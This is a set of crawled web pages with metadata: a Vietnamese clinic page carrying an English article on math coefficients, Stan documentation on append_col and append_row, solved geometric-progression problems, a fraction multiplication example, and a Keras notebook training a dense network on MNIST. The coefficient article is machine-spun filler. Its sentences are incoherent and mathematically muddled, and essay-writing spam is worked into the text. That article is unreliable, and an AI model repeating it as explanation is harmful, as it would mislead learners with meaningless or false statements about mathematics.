[ "", null, "", null, "", null, "Cơ sở vật chất\nHiện đại hàng đầu\n\nCông nghệ tiên phong\nDẫn đầu hiệu quả\n\nĐội ngũ bác sĩ\nQuốc tế giàu kinh nghiệm\n\nDịch vụ khách hàng\n\nTại sao nên lựa chọn phòng khám đa khoa Bảo Anh\n\nPhòng khám đa khoa Bảo Anh đạt tiêu chuẩn", null, "Phòng khám đa khoa Bảo Anh đạt tiêu chuẩn", null, "The Hidden Treasure of What Is a Coefficient in Math\n\nSensitivity to the data distribution might be utilized to a benefit. The beta coefficient can be useful in attempting to predict a specific stock’s paramountessays tendencies and calculate the total risk. In the event it isn’t revealed, it may be biased.\n\nA circle with a larger diameter is probably going to have a larger circumference. Another object is presented and placed on the very same side. The outcome will be an excellent approximation to our original function.\n\nWhat Is a Coefficient in Math Secrets\n\nYou must have something that looks like this… From here, you’re going to need to utilize your imagination a bit. Select any 2 things that you use in your day-to-day life and which are related. Frequently, those who are bad at math are bad at a lot of things.\n\nThe increased part of students with learning problems are those who find it challenging to remember patterns. An individual needs to be sound in mathematics as a means to start machine learning. Math concepts might also be reinforced for the children during the day on a standard basis.\n\nSensitivity to the data distribution might be utilized to a benefit. The degree of positive correlation will likely vary over time. It is very important to be aware that correlation by no means relates https://www.deltacollege.edu/emp/pwall/documents/HowtoWriteaSummarywithDunayer.pdf to causation.\n\nWhat Is a Coefficient in Math Ideas\n\nIn the event the answer is no, then 2 isn’t a factor of 25. If every term in an expression has a lot of things, and if every term has a minumum of one factor that’s the exact same, then that factor is known as a typical aspect. Enter the expression that you want to factor, set the choices and click the Factor button.\n\nFinding out how to tackle a linear equation will give you a simple comprehension of algebra so that you will have the ability to handle more elaborate equations later. By the moment you complete these totally free math worksheets, you’re going to be a specialist at making your Algebra homework just slightly simpler. Probability In this last program, students see how the many techniques of algebra they have learned can be put on the study of probability.\n\nA division problem might be written vertically. Any number in the triangle can be seen by adding both numbers diagonally above it. Further, it is a horizontal line.\n\nOk, I Think I Understand What Is a Coefficient in Math, Now Tell Me About What Is a Coefficient in Math!\n\nA standard maths challenge is to learn whether a particular polynomial can be written as a linear blend of another polynomials. To begin with, you wish to comprehend your squares. Finding out how to tackle a linear equation will give you a very simple comprehension of algebra so you are going in order to handle more elaborate equations later.\n\nIt doesn’t alter the measurement scale. A square is a normal quadrilateral. It will be an extremely very good approximation to our original function.\n\nIn more complicated math problems, the expressions can secure a bit more involved. My sense is the fact that it’s pretty even. 
The Taylor expansion is one of the most gorgeous ideas in mathematics.\n\nQuestion 1 is an intricate fraction. The worth of information correlation comes into play when you have a dataset with different capabilities. It is simply the selection of input variables.\n\nThe Lost Secret of What Is a Coefficient in Math\n\nIt is a fact that there’s a giant, enormous collection of numbers out there, and each of them is distinctive college essay writing service and different in its own way. In other provisions, an item is the response to any multiplication issue. 1 While it’s a fact that this is the loneliest number, it’s also much more.\n\nRather, it is an effect of the array of classes that were selected. There are times that you’ve limited control. Let’s look at an important example.\n\nIn the problem sets below, you will also have the chance to improve at working with exponents. The matter here is the best way to define similarity. Well, formulas can be simpler or complex based on this issue you selected but there’s need of depth understanding of each one of the formula to fix a specific issue.\n\nThere are two methods to examine fractions. With the help of a calculator, the procedure of successive approximations can be accomplished quickly. The elimination way of solving systems of equations is also known as the addition system.\n\nFor businessman, for example, the correlation coefficient could be utilised to appraise the success or failure of a particular advert or company strategy. A regression involving multiple associated variables can create a curved line in some scenarios. Then you pick the biggest factor that could be located in each number.\n\nWhat Is a Coefficient in Math at a Glance\n\nStudents represent multiplication facts through the usage of context. When it is positive, the inequality will stay the same. The notion of collective comprehension and the function of society in individual understandings is hinted at too.\n\nGetting the Best What Is a Coefficient in Math\n\nThe Correlation Coefficient may be used to spot non-correlated securities, which is important in creating a diversified portfolio. Math isn’t restricted to theoretical or continuous mathematics approach but you have to have heard of discrete mathematics too. Learning Math isn’t simple and this is why we’ve discovered unique approaches to amplify your learning.\n\nWhat Is a Coefficient in Math for Dummies\n\nIn more complicated math problems, the expressions can secure a bit more involved. When it is positive, the inequality will stay the same. It is among the most attractive ideas in mathematics.\n\nThere are a few rules that may help simplify or evaluate series. It is a significant investment if you wish to have into long range shooting and will be particularly useful when you handload. Let’s look at a great example.\n\nVN:F [1.9.22_1171]\nVN:F [1.9.22_1171]", null, "Tin tức liên quan", null, "", null, "PK đa khoa Bảo Anh nỗ lực xây dựng thương hiệu thân thiện", null, "Phòng khám đa khoa Bảo Anh (Hà Nội): Nỗ lực xây dựng một thương hiệu thân thiện", null, "Trường quay trực tuyến “Sức khỏe sinh sản và an toàn tình dục”\n\nhotline : 02438288288" ]
[ null, "https://www.facebook.com/tr", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-uytin.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-hotline.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/tieu-chuan.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/single-banner.jpg", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/box-loikhuyenbacsi.gif", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-phongkham.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/ndt.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/tinmoi.jpg", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/dspl.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9319287,"math_prob":0.90634394,"size":5915,"snap":"2019-26-2019-30","text_gpt3_token_len":1178,"char_repetition_ratio":0.106073424,"word_repetition_ratio":0.088709675,"special_character_ratio":0.19019443,"punctuation_ratio":0.08563782,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97953546,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,null,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T19:21:01Z\",\"WARC-Record-ID\":\"<urn:uuid:80199289-a3a4-403a-a15b-6fe017659733>\",\"Content-Length\":\"54073\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a4198ae2-e9e0-4bf7-8bf8-fa5dfe52a85f>\",\"WARC-Concurrent-To\":\"<urn:uuid:8f7cbdf8-cfc6-4dc0-8b23-16088de55159>\",\"WARC-IP-Address\":\"112.213.89.43\",\"WARC-Target-URI\":\"http://khamphukhoa.org/underrated-concerns-about-what-is-a-coefficient-in-math-you-should-read-about/\",\"WARC-Payload-Digest\":\"sha1:2N66UJARYN6IFYCML6A3AGQFW53SMQS5\",\"WARC-Block-Digest\":\"sha1:ZYXBSUJYHDRZTTAOLJUPL5DY3ZDFGTME\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998291.9_warc_CC-MAIN-20190616182800-20190616204800-00216.warc.gz\"}"}
https://mc-stan.org/docs/2_28/functions-reference/matrix-concatenation.html
[ "This is an old version, view current version.\n\n## 6.11 Matrix concatenation\n\nStan’s matrix concatenation operations append_col and append_row are like the operations cbind and rbind in R.\n\n#### 6.11.0.1 Horizontal concatenation\n\nmatrix append_col(matrix x, matrix y)\nCombine matrices x and y by columns. The matrices must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(matrix x, vector y)\nCombine matrix x and vector y by columns. The matrix and the vector must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(vector x, matrix y)\nCombine vector x and matrix y by columns. The vector and the matrix must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(vector x, vector y)\nCombine vectors x and y by columns. The vectors must have the same number of rows.\nAvailable since 2.5\n\nrow_vector append_col(row_vector x, row_vector y)\nCombine row vectors x and y of any size into another row vector.\nAvailable since 2.5\n\nrow_vector append_col(real x, row_vector y)\nAppend x to the front of y, returning another row vector.\nAvailable since 2.12\n\nrow_vector append_col(row_vector x, real y)\nAppend y to the end of x, returning another row vector.\nAvailable since 2.12\n\n#### 6.11.0.2 Vertical concatenation\n\nmatrix append_row(matrix x, matrix y)\nCombine matrices x and y by rows. The matrices must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(matrix x, row_vector y)\nCombine matrix x and row vector y by rows. The matrix and the row vector must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(row_vector x, matrix y)\nCombine row vector x and matrix y by rows. The row vector and the matrix must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(row_vector x, row_vector y)\nCombine row vectors x and y by row. The row vectors must have the same number of columns.\nAvailable since 2.5\n\nvector append_row(vector x, vector y)\nConcatenate vectors x and y of any size into another vector.\nAvailable since 2.5\n\nvector append_row(real x, vector y)\nAppend x to the top of y, returning another vector.\nAvailable since 2.12\n\nvector append_row(vector x, real y)\nAppend y to the bottom of x, returning another vector.\nAvailable since 2.12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82251185,"math_prob":0.9955631,"size":2186,"snap":"2022-27-2022-33","text_gpt3_token_len":562,"char_repetition_ratio":0.1984418,"word_repetition_ratio":0.4214876,"special_character_ratio":0.24199452,"punctuation_ratio":0.13747229,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99889964,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T10:36:47Z\",\"WARC-Record-ID\":\"<urn:uuid:511f8125-3de4-4a4b-9ae7-e1667ee87751>\",\"Content-Length\":\"104493\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9a000f36-2010-422a-bb7a-8ef261dc60d5>\",\"WARC-Concurrent-To\":\"<urn:uuid:e977c6f6-2f52-424b-9feb-818df758dd3a>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://mc-stan.org/docs/2_28/functions-reference/matrix-concatenation.html\",\"WARC-Payload-Digest\":\"sha1:FNTE5DJRVVWYW6FTCMCBGUMB6JTWCQPY\",\"WARC-Block-Digest\":\"sha1:SFKSJ22LMET32KUAH6SH374K477BWWMH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572898.29_warc_CC-MAIN-20220817092402-20220817122402-00043.warc.gz\"}"}
https://www.ask-math.com/solved-sums-on-geometric-progression.html
[ "# Solved sums on Geometric Progression\n\nIn this section, ask-math has given some solved sums on geometric progression. These problems help the students to learn how to solve the difficult questions on G.P. This page is based on the problems on nth terms of G.P. For that we use the following formula\n$a_{n} = ar^{n - 1}$\nwhere a= first term\ncommon ratio = r\nnumber of terms = n\n\n## solved sums on geometric progression\n\n1) The first term fo G.P is 1 and $a_{3} +a_{5}$ = 90. Find 'r'.\nSolution : We know that, $a_{n} = ar^{n - 1}$ and\nfirst term = a = 1\n∴ $a_{3} = 1 \\times r^{3 - 1}$ ⇒ $a_{3} = r^{2}$\nsimilarly, $a_{5} = 1 \\times r^{5 - 1}$ ⇒ $a_{5} = r^{4}$\nAs $a_{3} +a_{5}$ = 90\n$r^{2} + r^{4}$ = 90\n$r^{4} + r^{2}$ - 90 = 0\nConsidering this as a quadratic equation so we will find the factors of it\n$\\left ( r^{2} \\right )^{2} + 10 r^{2} -9 r^{2}$- 90 = 0\n$r^{2}( r^{2}$ + 10) -9($r^{2}$ + 10) = 0\n∴ ( $r^{2}$ + 10)( $r^{2}$ - 9)\n∴ $r^{2}$ + 10 = 0      and $r^{2}$ - 9 = 0\n$r^{2}$ = - 10       $r^{2}$ = 9\nr =$\\pm\\sqrt{-10}$       r = $\\pm$ 3\nThe common ratio never be imaginary(complex number)\n∴ common ratio = r = $\\pm$ 3\n\n2) If the first and the nth terms of G.P. are 'a' and 'b' respectively. If 'p' is the product of the first and the nth term then prove that : $p^{2} = (ab)^{n}$\nSolution : We know that,\n$a_{n} = ar^{n - 1}$\nnth term = b\n∴ b = $ar^{n - 1}$\n\n∴ $r^{n - 1} = \\frac{b}{a}$\n\n∴ r =$\\left ( \\frac{b}{a} \\right )^\\frac{1}{n - 1}$ -----------(1)\n\nNow, the product of n terms = p\n∴ p = a $\\times$ ar $\\times ar^{2} \\times$ ...a$r^{n - 1}$\n\n= $a^{n}\\times r^{1 + 2 + 3 + ...+(n -1)}$\n\n= $a^{n}\\times r^{\\frac {n(n -1)}{2}}$\n\n=$a^{n}\\left ( \\frac{b}{a} \\right )^{\\frac{n(n-1)}{2}\\times \\frac{1}{(n -1)}}$\n\n= $a^{n}\\left ( \\frac{b}{a} \\right )^\\frac{n}{2}$\n\n= $a^{n}\\left ( \\frac{b^\\frac{n}{2}}{a^\\frac{n}{2}} \\right )$\n\np = $a^{\\frac{n}{2}} . b^{\\frac{n}{2}}$\n∴ p = $\\left ( ab \\right )^{\\frac{n}{2}}$\n∴ $p^{2} = \\left ( ab \\right )^{n}$\n\n3) If the $p^{th}, q^{th} and r^{th}$ terms of G.P. are 'a' , 'b' and 'c' respectively then prove that\n$a^{q-r}. b^{r -p} . c^{p -q}$ = 1\nSolution : We know that,\n$a_{n} = ar^{n - 1}$\nn = p,q and r and first term = A and common ratio = R\n∴ $a_{p} = AR^{p - 1}$       $a_{q} = AR^{q - 1}$\n$a_{r} = AR^{r - 1}$\n$p^{th}$ term = a ,   $q^{th}$ = b    and $r^{th}$ = c\n\n∴ a = $A R^{p - 1}$       b = $A R^{q - 1}$      c =$A R^{r - 1}$\n\nWe have , $a^{q-r}. b^{r -p} . c^{p -q}$\n\nSubstitute the values of a,b and c we get\n\nL.H.S = $\\left ( AR^{(p -1)} \\right )^{(q-r)}.\\left ( AR^{(q -1)} \\right )^{(r-p)}.\\left ( AR^{(r -1)} \\right )^{(p-q)}$\n\n= $A^{(q -r +r - p + p -q)}. R^{(p-1)(q-r) +(q -1)(r-p)+(r -1)(p-q)}$\n\n= $A^{0} . R^{(pq -pr -q + r + qr-pq - r + p +rp - rq - p +q)}$\n\n= 1. $R^{0}$\n= 1 ---------Proved" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6758728,"math_prob":1.00001,"size":2986,"snap":"2020-45-2020-50","text_gpt3_token_len":1270,"char_repetition_ratio":0.13480885,"word_repetition_ratio":0.04568528,"special_character_ratio":0.50535834,"punctuation_ratio":0.08160237,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-29T04:56:23Z\",\"WARC-Record-ID\":\"<urn:uuid:80d04b65-0c7c-4c68-a96a-380076e69a31>\",\"Content-Length\":\"112530\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b2494708-04cd-46f9-a036-ba6468b50333>\",\"WARC-Concurrent-To\":\"<urn:uuid:07daae98-67fa-40cd-96ba-251b3d22af26>\",\"WARC-IP-Address\":\"172.67.136.139\",\"WARC-Target-URI\":\"https://www.ask-math.com/solved-sums-on-geometric-progression.html\",\"WARC-Payload-Digest\":\"sha1:EEZXTRQXOFSFQP3TOZFCYZQXQXEOYVPI\",\"WARC-Block-Digest\":\"sha1:FYWWMR3UDCZRQN2BFOEZQMAMQH6WME3B\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141196324.38_warc_CC-MAIN-20201129034021-20201129064021-00434.warc.gz\"}"}
https://answers.everydaycalculation.com/multiply-fractions/6-15-times-9-7
[ "Solutions by everydaycalculation.com\n\n## Multiply 6/15 with 9/7\n\n1st number: 6/15, 2nd number: 1 2/7\n\nThis multiplication involving fractions can also be rephrased as \"What is 6/15 of 1 2/7?\"\n\n6/15 × 9/7 is 18/35.\n\n#### Steps for multiplying fractions\n\n1. Simply multiply the numerators and denominators separately:\n2. 6/15 × 9/7 = 6 × 9/15 × 7 = 54/105\n3. After reducing the fraction, the answer is 18/35\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82294786,"math_prob":0.9714607,"size":490,"snap":"2022-40-2023-06","text_gpt3_token_len":225,"char_repetition_ratio":0.19753087,"word_repetition_ratio":0.0,"special_character_ratio":0.5020408,"punctuation_ratio":0.06923077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9781682,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-06T16:13:35Z\",\"WARC-Record-ID\":\"<urn:uuid:eb9aa314-eb84-4c7f-977b-8ffb31f7a810>\",\"Content-Length\":\"7919\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:795b8f84-83ca-4c73-93f2-577429f7449b>\",\"WARC-Concurrent-To\":\"<urn:uuid:78a5a954-7db8-4be1-a3a0-bf290662eda1>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/multiply-fractions/6-15-times-9-7\",\"WARC-Payload-Digest\":\"sha1:2Y6GLOGLYH2AUQLILNOHRBCXRNXJ2XY2\",\"WARC-Block-Digest\":\"sha1:5O5YCRXYW5WIVADSQ42G55HCK32B4TU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500356.92_warc_CC-MAIN-20230206145603-20230206175603-00420.warc.gz\"}"}
https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/3.1%20Hidden%20Layer%20Representation%20and%20Embeddings.html
[ "# Fully Connected Feed-Forward Network\n\nIn this notebook we will play with Feed-Forward FC-NN (Fully Connected Neural Network) for a classification task:\n\nImage Classification on MNIST Dataset\n\nRECALL\n\nIn the FC-NN, the output of each layer is computed using the activations from the previous one, as follows:\n\n$$h{i} = \\sigma(W_i h{i-1} + b_i)$$\n\nwhere ${h}_i$ is the activation vector from the $i$-th layer (or the input data for $i=0$), ${W}_i$ and ${b}_i$ are the weight matrix and the bias vector for the $i$-th layer, respectively.\n$\\sigma(\\cdot)$ is the activation function. In our example, we will use the ReLU activation function for the hidden layers and softmax for the last layer.\n\nTo regularize the model, we will also insert a Dropout layer between consecutive hidden layers.\n\nDropout works by “dropping out” some unit activations in a given layer, that is setting them to zero with a given probability.\n\nOur loss function will be the categorical crossentropy.\n\n## Model definition\n\nKeras supports two different kind of models: the Sequential model and the Graph model. The former is used to build linear stacks of layer (so each layer has one input and one output), and the latter supports any kind of connection graph.\n\nIn our case we build a Sequential model with three Dense (aka fully connected) layers, with some Dropout. Notice that the output layer has the softmax activation function.\n\nThe resulting model is actually a function of its own inputs implemented using the Keras backend.\n\nWe apply the binary crossentropy loss and choose SGD as the optimizer.\n\nPlease remind that Keras supports a variety of different optimizers and loss functions, which you may want to check out.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n%matplotlib inline\n\n\n## Introducing ReLU\n\nThe ReLu function is defined as $f(x) = \\max(0, x),$ \n\nA smooth approximation to the rectifier is the analytic function: $f(x) = \\ln(1 + e^x)$\n\nwhich is called the softplus function.\n\nThe derivative of softplus is $f'(x) = e^x / (e^x + 1) = 1 / (1 + e^{-x})$, i.e. the logistic function.\n\n http://www.cs.toronto.edu/~fritz/absps/reluICML.pdf by G. E. 
Hinton\n\n### Note: Keep in mind this function as it is heavily used in CNN\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\n\nnb_classes = 10\n\n# FC@512+relu -> FC@512+relu -> FC@nb_classes+softmax\n\n# %load ../solutions/sol_321.py\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001),\nmetrics=['accuracy'])\n\n\n## Data preparation (keras.dataset)\n\nWe will train our model on the MNIST dataset, which consists of 60,000 28x28 grayscale images of the 10 digits, along with a test set of 10,000 images.", null, "Since this dataset is provided with Keras, we just ask the keras.dataset model for training and test data.\n\nWe will:\n\n• reshape data to be in vectorial form (original data are images)\n• normalize between 0 and 1.\n\nThe binary_crossentropy loss expects a one-hot-vector as input, therefore we apply the to_categorical function from keras.utilis to convert integer labels to one-hot-vectors.\n\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train.shape\n\n(60000, 28, 28)\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\n\n# Put everything on grayscale\nX_train /= 255\nX_test /= 255\n\n# convert class vectors to binary class matrices\nY_train = np_utils.to_categorical(y_train, 10)\nY_test = np_utils.to_categorical(y_test, 10)\n\n\n#### Split Training and Validation Data\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train)\n\nX_train.shape\n\n(784,)\n\nplt.imshow(X_train.reshape(28, 28))\n\n<matplotlib.image.AxesImage at 0x7f7f8cea6438>", null, "print(np.asarray(range(10)))\nprint(Y_train.astype('int'))\n\n[0 1 2 3 4 5 6 7 8 9]\n[0 0 0 0 0 1 0 0 0 0]\n\nplt.imshow(X_val.reshape(28, 28))\n\n<matplotlib.image.AxesImage at 0x7f7f8ce4f9b0>", null, "print(np.asarray(range(10)))\nprint(Y_val.astype('int'))\n\n[0 1 2 3 4 5 6 7 8 9]\n[0 0 0 0 1 0 0 0 0 0]\n\n\n## Training\n\nHaving defined and compiled the model, it can be trained using the fit function. We also specify a validation dataset to monitor validation loss and accuracy.\n\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=2, verbose=1, validation_data=(X_val, Y_val))\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/2\n45000/45000 [==============================] - 1s - loss: 2.1743 - acc: 0.2946 - val_loss: 2.0402 - val_acc: 0.5123\nEpoch 2/2\n45000/45000 [==============================] - 1s - loss: 1.9111 - acc: 0.6254 - val_loss: 1.7829 - val_acc: 0.6876\n\n\n### Plotting Network Performance Trend\n\nThe return value of the fit function is a keras.callbacks.History object which contains the entire history of training/validation loss and accuracy, for each epoch. 
We can therefore plot the behaviour of loss and accuracy during the training phase.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\ndef plot_history(network_history):\nplt.figure()\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.plot(network_history.history['loss'])\nplt.plot(network_history.history['val_loss'])\nplt.legend(['Training', 'Validation'])\n\nplt.figure()\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.plot(network_history.history['acc'])\nplt.plot(network_history.history['val_acc'])\nplt.legend(['Training', 'Validation'], loc='lower right')\nplt.show()\n\nplot_history(network_history)", null, "", null, "After 2 epochs, we get a ~88% validation accuracy.\n\n• If you increase the number of epochs, you will get definitely better results.\n\n### Quick Exercise:\n\nTry increasing the number of epochs (if you're hardware allows to)\n\n# Your code here\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001),\nmetrics=['accuracy'])\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=2, verbose=1, validation_data=(X_val, Y_val))\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/2\n45000/45000 [==============================] - 2s - loss: 0.8966 - acc: 0.8258 - val_loss: 0.8463 - val_acc: 0.8299\nEpoch 2/2\n45000/45000 [==============================] - 1s - loss: 0.8005 - acc: 0.8370 - val_loss: 0.7634 - val_acc: 0.8382\n\n\n## Introducing the Dropout Layer\n\nThe dropout layers have the very specific function to drop out a random set of activations in that layers by setting them to zero in the forward pass. Simple as that.\n\nIt allows to avoid overfitting but has to be used only at training time and not at test time.\n\n\nkeras.layers.core.Dropout(rate, noise_shape=None, seed=None)\n\n\nApplies Dropout to the input.\n\nDropout consists in randomly setting a fraction rate of input units to 0 at each update during training time, which helps prevent overfitting.\n\nArguments\n\n• rate: float between 0 and 1. Fraction of the input units to drop.\n• noise_shape: 1D integer tensor representing the shape of the binary dropout mask that will be multiplied with the input. For instance, if your inputs have shape (batch_size, timesteps, features) and you want the dropout mask to be the same for all timesteps, you can use noise_shape=(batch_size, 1, features).\n• seed: A Python integer to use as random seed.\n\nNote Keras guarantess automatically that this layer is not used in Inference (i.e. 
Prediction) phase (thus only used in training as it should be!)\n\nSee keras.backend.in_train_phase function\n\nfrom keras.layers.core import Dropout\n\n## Pls note **where** the K.in_train_phase is actually called!!\nDropout??\n\nfrom keras import backend as K\n\nK.in_train_phase?\n\n\n### Exercise:\n\nTry modifying the previous example network adding a Dropout layer:\n\nfrom keras.layers.core import Dropout\n\n# FC@512+relu -> DropOut(0.2) -> FC@512+relu -> DropOut(0.2) -> FC@nb_classes+softmax\n\n# %load ../solutions/sol_312.py\n\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=4, verbose=1, validation_data=(X_val, Y_val))\nplot_history(network_history)\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/4\n45000/45000 [==============================] - 2s - loss: 1.3746 - acc: 0.6348 - val_loss: 0.6917 - val_acc: 0.8418\nEpoch 2/4\n45000/45000 [==============================] - 2s - loss: 0.6235 - acc: 0.8268 - val_loss: 0.4541 - val_acc: 0.8795\nEpoch 3/4\n45000/45000 [==============================] - 1s - loss: 0.4827 - acc: 0.8607 - val_loss: 0.3795 - val_acc: 0.8974\nEpoch 4/4\n45000/45000 [==============================] - 1s - loss: 0.4218 - acc: 0.8781 - val_loss: 0.3402 - val_acc: 0.9055", null, "", null, "• If you continue training, at some point the validation loss will start to increase: that is when the model starts to overfit.\n\nIt is always necessary to monitor training and validation loss during the training of any kind of Neural Network, either to detect overfitting or to evaluate the behaviour of the model (any clue on how to do it??)\n\n# %load solutions/sol23.py\nfrom keras.callbacks import EarlyStopping\n\nearly_stop = EarlyStopping(monitor='val_loss', patience=4, verbose=1)\n\nmodel = Sequential()\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(),\nmetrics=['accuracy'])\n\nmodel.fit(X_train, Y_train, validation_data = (X_test, Y_test), epochs=100,\nbatch_size=128, verbose=True, callbacks=[early_stop])\n\n\n# Inspecting Layers\n\n# We already used summary\nmodel.summary()\n\n_________________________________________________________________\nLayer (type) Output Shape Param #\n=================================================================\ndense_4 (Dense) (None, 512) 401920\n_________________________________________________________________\ndropout_1 (Dropout) (None, 512) 0\n_________________________________________________________________\ndense_5 (Dense) (None, 512) 262656\n_________________________________________________________________\ndropout_2 (Dropout) (None, 512) 0\n_________________________________________________________________\ndense_6 (Dense) (None, 10) 5130\n=================================================================\nTotal params: 669,706\nTrainable params: 669,706\nNon-trainable params: 0\n_________________________________________________________________\n\n\n### model.layers is iterable\n\nprint('Model Input Tensors: ', model.input, end='\\n\\n')\nprint('Layers - Network Configuration:', end='\\n\\n')\nfor layer in model.layers:\nprint(layer.name, layer.trainable)\nprint('Layer Configuration:')\nprint(layer.get_config(), end='\\n{}\\n'.format('----'*10))\nprint('Model Output Tensors: ', model.output)\n\nModel Input Tensors: Tensor(\"dense_4_input:0\", shape=(?, 784), dtype=float32)\n\nLayers - Network Configuration:\n\ndense_4 True\nLayer Configuration:\n{'batch_input_shape': (None, 784), 'name': 'dense_4', 'units': 512, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 
'class_name': 'Zeros'}, 'trainable': True, 'activation': 'relu', 'use_bias': True, 'bias_constraint': None, 'activity_regularizer': None, 'kernel_regularizer': None, 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 'VarianceScaling'}, 'dtype': 'float32'}\n----------------------------------------\ndropout_1 True\nLayer Configuration:\n{'name': 'dropout_1', 'rate': 0.2, 'trainable': True}\n----------------------------------------\ndense_5 True\nLayer Configuration:\n{'kernel_regularizer': None, 'units': 512, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 'class_name': 'Zeros'}, 'trainable': True, 'activation': 'relu', 'bias_constraint': None, 'activity_regularizer': None, 'name': 'dense_5', 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 'VarianceScaling'}, 'use_bias': True}\n----------------------------------------\ndropout_2 True\nLayer Configuration:\n{'name': 'dropout_2', 'rate': 0.2, 'trainable': True}\n----------------------------------------\ndense_6 True\nLayer Configuration:\n{'kernel_regularizer': None, 'units': 10, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 'class_name': 'Zeros'}, 'trainable': True, 'activation': 'softmax', 'bias_constraint': None, 'activity_regularizer': None, 'name': 'dense_6', 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 'VarianceScaling'}, 'use_bias': True}\n----------------------------------------\nModel Output Tensors: Tensor(\"dense_6/Softmax:0\", shape=(?, 10), dtype=float32)\n\n\n## Extract hidden layer representation of the given data\n\nOne simple way to do it is to use the weights of your model to build a new model that's truncated at the layer you want to read.\n\nThen you can run the ._predict(X_batch) method to get the activations for a batch of inputs.\n\nmodel_truncated = Sequential()\n\nfor i, layer in 